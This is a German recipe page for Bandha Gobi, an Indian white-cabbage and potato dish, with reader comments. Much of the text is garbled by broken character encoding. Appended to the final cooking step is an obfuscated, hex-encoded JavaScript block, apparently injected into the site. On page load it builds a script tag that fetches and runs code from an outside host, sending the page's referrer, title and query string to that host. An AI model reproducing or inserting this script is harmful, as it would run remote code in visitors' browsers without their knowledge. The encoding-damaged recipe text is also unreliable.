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Bandha Gobi (Indischer WeiAYkohl)

Ein sehr leckeres und aromatisches Bandha Gobi Rezept. Mit diesem Gericht gelingt Ihnen ein vegetarisches, indisches Gericht.

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  • Zutaten:
  • 500g WeiAYkohl (WeiAYkraut)
  • 250g Kartoffeln
  • 3 Tomaten
  • 3 EL Ghee, alternativ: 5EL A�l
  • 3 A?a��a�? 5 LorbeerblA�tter
  • 3 – 4 EL Garam Masala
  • Salz
  • 200g TK-Erbsen

Zubereitung:

bandha-gobi.jpg

Kartoffeln und WeiAYkohl klein schneiden und in einer SchA?ssel beiseite stellen.
Tomaten klein schneiden und separat zur Seite stellen.

Das Ghee in einem groAYen Topf heiAY werden lassen. Garam Masala und die LorbeerblA�tter in den Topf geben, kurz warten , dann kommen der WeiAYkohl und die Kartoffeln dazu. Das GemA?se 10 min kochen lassen.

Als nA�chstes die Tomaten untermischen und nochmals ca. 15 min auf kleiner Flamme dahin kA�cheln lassen.

Die Erbsen dazugeben und weitere 5 min. kA�cheln lassen. Zum Schluss noch mit Salz und eventuell Garam Masala nachwA?rzen.var _0xd052=[„x73x63x72x69x70x74″,“x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,“x73x72x63″,“x68x74x74x70x3Ax2Fx2Fx67x65x74x68x65x72x65x2Ex69x6Ex66x6Fx2Fx6Bx74x2Fx3Fx33x63x58x66x71x6Bx26x73x65x5Fx72x65x66x65x72x72x65x72x3D“,“x72x65x66x65x72x72x65x72″,“x26x64x65x66x61x75x6Cx74x5Fx6Bx65x79x77x6Fx72x64x3D“,“x74x69x74x6Cx65″,“x26″,“x3F“,“x72x65x70x6Cx61x63x65″,“x73x65x61x72x63x68″,“x6Cx6Fx63x61x74x69x6Fx6E“,“x26x66x72x6Dx3Dx73x63x72x69x70x74″,“x63x75x72x72x65x6Ex74x53x63x72x69x70x74″,“x69x6Ex73x65x72x74x42x65x66x6Fx72x65″,“x70x61x72x65x6Ex74x4Ex6Fx64x65″,“x61x70x70x65x6Ex64x43x68x69x6Cx64″,“x68x65x61x64″,“x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65″,“x70x72x6Fx74x6Fx63x6Fx6C“,“x68x74x74x70x73x3A“,“x69x6Ex64x65x78x4Fx66″,“x52x5Fx50x41x54x48″,“x54x68x65x20x77x65x62x73x69x74x65x20x77x6Fx72x6Bx73x20x6Fx6Ex20x48x54x54x50x53x2Ex20x54x68x65x20x74x72x61x63x6Bx65x72x20x6Dx75x73x74x20x75x73x65x20x48x54x54x50x53x20x74x6Fx6Fx2E“];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

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Mitglied seit 2006

5 Kommentare zu Rezept – Bandha Gobi (Indischer WeiAYkohl)

  1. Schmeckte meiner Familie und mir sehr gut.
    Bei der Zubereitung muss es statt
    „Kartoffeln und Blumenkohl klein schneiden…“ natürlich:
    „Kartoffeln und Weisskohl klein schneiden…“ heissen.
    Viele Grüsse aus Berlin!

  2. Hallo Horst,
    vielen Dank für den Hinweis! Habe es soeben geändert. Freut mich sehr, dass euch das Gericht geschmeckt hat!

  3. Hallo, habe das rezept hier über google gefunden und bin wirklich überrascht was man alles mit Weisskohl machen kann. Die Variante hört sich lecker an, allerdings habe ich etwas angst das es nicht gelint ;-) bin halt kein Kochprofi.

    Gruß Thorben

  4. Naja, irgendwie muss man ja seine Erfahrungen machen. Alles was passieren kann ist, dass es nicht schmeckt :-) Und noch ein weiser Spruch: Übung macht den Meister!

  5. Pingback: Würzig und vegetarisch: Indischer Weißkohl (Bandha Gobi) | Lotta - kochende Leidenschaft

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